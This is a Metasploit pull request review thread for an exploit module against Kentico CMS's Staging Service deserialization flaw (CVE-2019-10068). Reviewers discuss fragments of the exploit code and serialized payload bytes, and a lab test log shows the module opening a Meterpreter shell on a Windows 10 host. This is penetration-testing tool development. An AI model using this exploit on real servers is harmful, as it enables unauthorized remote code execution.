Added exploit module kentico_staging_syncserver.
rapid7/metasploit-framework pull request #13107
Opened 2020-03-22 06:59 UTC by aushack

CVE-2019-10068

2020-03-22 07:54 UTC, bcoles commented on documentation/modules/exploit/windows/http/kentico_staging_syncserver.md
> +  5. Check `Enable Starging Service` and click `Save`
`Staging` ?

```suggestion
  5. Check `Enable Staging Service` and click `Save`
```

2020-03-22 07:54 UTC, bcoles commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +    if res && res.body && res.body.to_s =~ /SyncServer Web Service/i # SOAP endpoint disco / WSDL
`=~` is `nil` safe.

```suggestion
    if res && res.body =~ /SyncServer Web Service/i # SOAP endpoint disco / WSDL
```

2020-03-22 07:54 UTC, bcoles commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +      if (b64 =~ /^[^=]+$/) # If no '=' in base64 string
This is shorter, easier to read, and removes the requirement for code comments:

```suggestion
      unless b64.include?('=')
```

or:

```ruby
    0.upto(3) do |padding|
      b64 = generate_base64(cmd + " " * padding)
      next if b64.include?('=')
      vprint_status("GOOD: " + b64)
      return b64
    end
```

2020-03-22 07:54 UTC, bcoles commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +    packet
```suggestion
    Rex::Text.encode_base64(pkt1+cmd+pkt2)
```

2020-03-22 08:04 UTC, aushack commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +    if res && res.body && res.body.to_s =~ /SyncServer Web Service/i # SOAP endpoint disco / WSDL
I think it breaks if body is nil which happened in some other modules.

2020-03-22 08:09 UTC, bcoles commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +    if res && res.body && res.body.to_s =~ /SyncServer Web Service/i # SOAP endpoint disco / WSDL
It shouldn't. The usual issues are trying to perform `=~` on `res.body` when `res` is `nil`, or performing `res.body.include?` without casting `to_s`.

2020-03-25 13:51 UTC, acammack-r7 commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +    pkt2 = "\x06\x07\x00\x00\x00\x03\x63\x6d\x64\x04\x05\x00\x00\x00\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x65\x6c\x65\x67\x61\x74\x65\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x6
It would be nice to see this formatted as our style guide suggests https://github.com/rubocop-hq/ruby-style-guide#long-strings or stored in files in the `data/exploits` directory.

2020-03-25 14:02 UTC, smcintyre-r7 commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +    pkt2 = "\x06\x07\x00\x00\x00\x03\x63\x6d\x64\x04\x05\x00\x00\x00\x22\x53\x79\x73\x74\x65\x6d\x2e\x44\x65\x6c\x65\x67\x61\x74\x65\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x6f\x6c\x6
`pkt1` at least looks like it's using the `BinaryFormatter` under the hood. You could probably utilize the mixin to generate that part at least and then handle the SOAP formatting within the module. You'd just need to check that the gadget chain `TextFormattingRunProperties` will work for this application as well. I'm in the process of adding others now so if it doesn't please let me know and I'll take a look.

2020-03-25 18:30 UTC, cdelafuente-r7 commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +    if res && res.body && res.body.to_s =~ /SyncServer Web Service/i # SOAP endpoint disco / WSDL
yes, as @bcoles suggested, this extra check is not necessary, `=~`is `nil` safe:
```ruby
2.6.5 :001 > var = nil
 => nil
2.6.5 :002 > var =~ /foo/
 => nil
```

2020-03-25 19:52 UTC, cdelafuente-r7 requested changes
@aushack, thanks for this contribution. I tested against Kentico CMS v11.0 on Windows 10 and it works as described. Thank you for your detailed `Verification Steps` documentation, it helped a lot!
I left a few comment for you to review before it lands.

2020-03-25 19:52 UTC, cdelafuente-r7 commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +      end
I was wondering if this loop logic is necessary. A base64 encoded string should not ends with padding `=` if the unencoded string length is a multiple of 3 bytes. Since the string size to be base64 encoded is known, it would be possible to just add padding to `cmd` until the total string size (`pkt1+cmd+padding+pkt2`) is a multiple of 3 bytes.

2020-03-25 19:52 UTC, cdelafuente-r7 commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +    pkt1 = "\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x0c\x02\x00\x00\x00\x49\x53\x79\x73\x74\x65\x6d\x2c\x20\x56\x65\x72\x73\x69\x6f\x6e\x3d\x34\x2e\x30\x2e\x30\x2e\x30\x2
Apparently, it does not work when using a large `cmd` string. On my testing, the exploit fails with a size greater than 122 bytes. I used this `cmd`:
```
calc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```
It looks like adding the `cmd` length in `pkt1` this way limits the size. This could be an issue and I would prefer having this fixed before landing.

Also, @smcintyre-r7 is actively working on adding support to `Msf::Util::DotNetDeserialization` and this would be a good solution here. It would replace the binary blob, fix this issue and also address @acammack-r7 comments. Of course, if you're okay to wait.

2020-03-25 19:52 UTC, cdelafuente-r7 commented on modules/exploits/windows/http/kentico_staging_syncserver.rb
> +      'Stance' => Msf::Exploit::Stance::Aggressive,
I am not sure if setting the `Stance` explicitly to `Msf::Exploit::Stance::Aggressive` is necessary. It seems to be the default here.

2020-03-30 10:30 UTC, aushack commented on documentation/modules/exploit/windows/http/kentico_staging_syncserver.md
> +  12. Do `set PAYLOAD cmd/windows/exec`
@cdelafuente-r7 oh yeah I'm used to the old payloads... think it is fixed now. Cheers!

2020-04-15 13:40 UTC, smcintyre-r7 commented
Note to myself and other testers. While the v11 trial version does restrict you to a random port and requests have to come from the localhost you can work around that for remote testing by:

* Adding a portforward on Windows (example is 8888 to the randomly selected port 49943)
    * `netsh interface portproxy add v4tov4 listenport=8888 listenaddress=0.0.0.0 connectport=49943 connectaddress=127.0.0.1`
* Setting the `VHOST` option to `localhost` in Metasploit
    * `set VHOST localhost`
    * `set RPORT 8888`

With that configuration you can test this module remotely.

2020-04-28 14:36 UTC, smcintyre-r7 commented
@aushack The .NET deserialization library changes for this have been merged into master. Would you be able to rebase your branch to pull those changes in? Once you've done that I'll send an update your way to use the new Soap Formatter.

2020-05-06 10:38 UTC, cdelafuente-r7 approved these changes

2020-05-06 14:13 UTC, cdelafuente-r7 commented
@smcintyre-r7, thanks for your updating the code! I successfully ran it against Kentico CMS v11.0 on Windows 10:
```
msf5 exploit(windows/http/kentico_staging_syncserver) > options

Module options (exploit/windows/http/kentico_staging_syncserver):

   Name       Current Setting                    Required  Description
   ----       ---------------                    --------  -----------
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.60.128                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8888                               yes       The target port (TCP)
   SRVHOST    0.0.0.0                            yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                               yes       The local port to listen on.
   SSL        false                              no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                       no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /CMSPages/Staging/SyncServer.asmx  yes       Path to SyncServer.asmx
   URIPATH                                       no        The URI to use for this exploit (default is random)
   VHOST      localhost                          no        HTTP server virtual host


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.16.60.128    no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Windows EXE Dropper


msf5 exploit(windows/http/kentico_staging_syncserver) > check
[*] 172.16.60.128:8888 - The service is running, but could not be validated.
msf5 exploit(windows/http/kentico_staging_syncserver) > run

[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
...[SNIP]...
[*] Command Stager progress -  97.47% done (98967/101539 bytes)
[*] Command Stager progress - 100.00% done (101539/101539 bytes)
[*] Started bind TCP handler against 172.16.60.128:4444
[-] The connection was refused by the remote host (172.16.60.128:4444).
[*] Sending stage (176195 bytes) to 172.16.60.128
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.16.60.128:4444) at 2020-05-06 16:10:02 +0200

meterpreter > sysinfo
Computer        : DESKTOP-5AR4M2S
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > [*] Shutting down Meterpreter...
```

2020-05-06 14:18 UTC, merged

2020-05-06 14:28 UTC, cdelafuente-r7 commented
# Release Notes
This adds an exploit module for an unauthenticated RCE in the Kentico CMS platform versions 12.0.14 and earlier. An attacker can leverage a deserialization vulnerability in the Staging Service to execute arbitrary commands in the context of the target server process.